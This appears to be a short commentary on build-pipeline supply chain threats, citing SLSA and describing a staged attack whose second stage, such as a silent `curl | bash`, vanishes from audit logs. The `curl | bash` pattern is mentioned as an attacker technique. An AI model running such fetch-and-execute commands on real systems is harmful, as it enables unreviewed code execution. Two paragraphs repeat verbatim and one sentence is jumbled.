When people think about Supply Chain security, they generally think of SBOM and vulnerabilities in your direct and transitive dependencies.
But most people are completely blind of vulnerabilities in the Build Pipeline of those same dependencies. The SLSA framework considers those https://slsa.dev/spec/v0.1/threats#build-integrity-threats to some extent. And OpenSSF aficionados know, but it's still niche.
I like to think of those as a parallel universe! An orthogonal plane of vulnerabilities that are beneath the surface and completely independent of vulnerabilities into the source code of the project itself. Basically never tracked as CVEs... Those can be nested deep, deep, in a transitive build dependency 5 levels down.
In the audit log of the organization you can see an event, but by that time you have lost visibility into what the attacker really executed.
So a malicious tag payload (stage 1) will still remain in events, but Stage 2 will be lost completely (only the fact that log was deleted) and that would not leak any what really was executed with like `curl | bash` could be silent
Most likely the end goal is to backdoor the final artifacts, so one could diff, I guess.
But most people are completely blind of vulnerabilities in the Build Pipeline of those same dependencies. The SLSA framework considers those https://slsa.dev/spec/v0.1/threats#build-integrity-threats to some extent. And OpenSSF aficionados know, but it's still niche.
I like to think of those as a parallel universe! An orthogonal plane of vulnerabilities that are beneath the surface and completely independent of vulnerabilities into the source code of the project itself. Basically never tracked as CVEs... Those can be nested deep, deep, in a transitive build dependency 5 levels down.